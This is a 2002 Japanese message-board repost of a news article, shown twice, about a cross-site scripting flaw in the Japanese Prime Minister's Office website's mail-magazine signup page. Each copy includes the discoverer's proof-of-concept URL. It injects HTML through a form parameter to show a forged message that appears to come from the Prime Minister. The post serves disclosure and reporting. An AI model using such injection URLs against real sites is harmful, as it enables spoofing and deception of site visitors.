首相官邸サイト
投稿者: aznrsrsnsn 投稿日時: 2002/03/14 20:23 投稿番号: [138360 / 177456]
コンピュータニュース - 3月14日(木)20時10分
首相官邸にクロスサイトスクリプティング問題 任意のメッセージを表示可能
3月13日、首相官邸の web にクロスサイトスクリプティングの問題が発見された。
首相官邸のホームページにクロスサイトスクリプティングの脆弱性
(2002.3.13)
https://www.netsecurity.ne.jp/article/1/4313.html
その後の対処により問題は解決されたかのように見えたが、まだ問題は残っていた。
今回発見された問題は、不正なコードを含む首相官邸へのリンクをおくことで任意のメッセージの表示が可能であった。このリンクからジャンプして手法官邸のページを訪れた利用者は、不正に仕組まれたメッセージをあたかも首相官邸のメッセージと誤認してしまう可能性がある。
問題は、「小泉内閣メールマガジン」の登録ページにあった。
このページではメールマガジンの読者登録の際に必要な情報を入力すると、その次の画面で入力された情報を表示して確認を求める。しかし、この画面に問題があり、不正なコードを入力することによって、任意のメッセージを画面に表示することが可能な状態になっていた。
発見者である office 氏は、首相官邸に通報するとともに、この問題に関する偽装可能性を示すサンプルコードを作成して公開した。
office 氏が情報を公開した掲示板
http://www.office.ac/tearoom/noframe.cgi
●首相官邸の偽装URLサンプル(下記をブラウザのURLに貼ってください)
http://www.mmz.kantei.go.jp/cgi-bin/confirm.pl?mailaddress=tewt@example.com&sex=><div%20align=left><font%20size=+5>%A1%CE%A4%E9%A4%A4%A4%AA%A4%F3%A4%CF%A1%BC%A4%C8%A1%A1%A1%C1%A1%A1%BE%AE%C0%F4%C1%ED%CD%FD%A4%CE%A5%E1%A5%C3%A5%BB%A1%BC%A5%B8%A1%CF<P>%BE%AE%C0%F4%BD%E3%B0%EC%CF%BA%A4%C7%A4%B9%A1%A3<p>%B9%BD%C2%A4%B2%FE%B3%D7%A4%CE%C3%EC%A4%C8%A4%B7%A4%C6%BF%CA%A4%E1%A4%C6%A4%AD%A4%BFe-Japan%B7%D7%B2%E8%A4%C7%A4%B9%A4%AC%A1%A2%A4%B3%A4%B3%A4%C7%B8%AB%C4%BE%A4%B7%A4%F2%A4%CF%A4%AB%A4%EB%A4%B3%A4%C8%A4%CB%A4%B7%A4%DE%A4%B7%A4%BF%A1%A3%BC%F3%C1%EA%B4%B1%C5%A1%A4%CE%A5%B5%A1%BC%A5%D0%A4%CB%A4%AA%A4%A4%A4%C6%A4%B5%A4%A8%B8%C4%BF%CD%BE%F0%CA%F3%A4%F2%C5%AC%C0%DA%A4%CB%CA%DD%B8%EE%A4%C7%A4%AD%A4%CA%A4%AB%A4%C3%A4%BF%A4%C8%A4%A4%A4%A6%BB%F6%BC%C2%A4%F2%C6%A7%A4%DE%A4%A8%B1%BE%A1%B9</div><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br></div>
Yahoo!ニュース
http://headlines.yahoo.co.jp/hl?a=20020314-00000015-vgb-sci
首相官邸にクロスサイトスクリプティング問題 任意のメッセージを表示可能
3月13日、首相官邸の web にクロスサイトスクリプティングの問題が発見された。
首相官邸のホームページにクロスサイトスクリプティングの脆弱性
(2002.3.13)
https://www.netsecurity.ne.jp/article/1/4313.html
その後の対処により問題は解決されたかのように見えたが、まだ問題は残っていた。
今回発見された問題は、不正なコードを含む首相官邸へのリンクをおくことで任意のメッセージの表示が可能であった。このリンクからジャンプして手法官邸のページを訪れた利用者は、不正に仕組まれたメッセージをあたかも首相官邸のメッセージと誤認してしまう可能性がある。
問題は、「小泉内閣メールマガジン」の登録ページにあった。
このページではメールマガジンの読者登録の際に必要な情報を入力すると、その次の画面で入力された情報を表示して確認を求める。しかし、この画面に問題があり、不正なコードを入力することによって、任意のメッセージを画面に表示することが可能な状態になっていた。
発見者である office 氏は、首相官邸に通報するとともに、この問題に関する偽装可能性を示すサンプルコードを作成して公開した。
office 氏が情報を公開した掲示板
http://www.office.ac/tearoom/noframe.cgi
●首相官邸の偽装URLサンプル(下記をブラウザのURLに貼ってください)
http://www.mmz.kantei.go.jp/cgi-bin/confirm.pl?mailaddress=tewt@example.com&sex=><div%20align=left><font%20size=+5>%A1%CE%A4%E9%A4%A4%A4%AA%A4%F3%A4%CF%A1%BC%A4%C8%A1%A1%A1%C1%A1%A1%BE%AE%C0%F4%C1%ED%CD%FD%A4%CE%A5%E1%A5%C3%A5%BB%A1%BC%A5%B8%A1%CF<P>%BE%AE%C0%F4%BD%E3%B0%EC%CF%BA%A4%C7%A4%B9%A1%A3<p>%B9%BD%C2%A4%B2%FE%B3%D7%A4%CE%C3%EC%A4%C8%A4%B7%A4%C6%BF%CA%A4%E1%A4%C6%A4%AD%A4%BFe-Japan%B7%D7%B2%E8%A4%C7%A4%B9%A4%AC%A1%A2%A4%B3%A4%B3%A4%C7%B8%AB%C4%BE%A4%B7%A4%F2%A4%CF%A4%AB%A4%EB%A4%B3%A4%C8%A4%CB%A4%B7%A4%DE%A4%B7%A4%BF%A1%A3%BC%F3%C1%EA%B4%B1%C5%A1%A4%CE%A5%B5%A1%BC%A5%D0%A4%CB%A4%AA%A4%A4%A4%C6%A4%B5%A4%A8%B8%C4%BF%CD%BE%F0%CA%F3%A4%F2%C5%AC%C0%DA%A4%CB%CA%DD%B8%EE%A4%C7%A4%AD%A4%CA%A4%AB%A4%C3%A4%BF%A4%C8%A4%A4%A4%A6%BB%F6%BC%C2%A4%F2%C6%A7%A4%DE%A4%A8%B1%BE%A1%B9</div><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br></div>
Yahoo!ニュース
http://headlines.yahoo.co.jp/hl?a=20020314-00000015-vgb-sci
これは メッセージ 1 (messages_admin さん)への返信です.
固定リンク:https://yarchive.emmanuelc.dix.asia/1143582/bpjfa4lla5fa5m_1/138360.html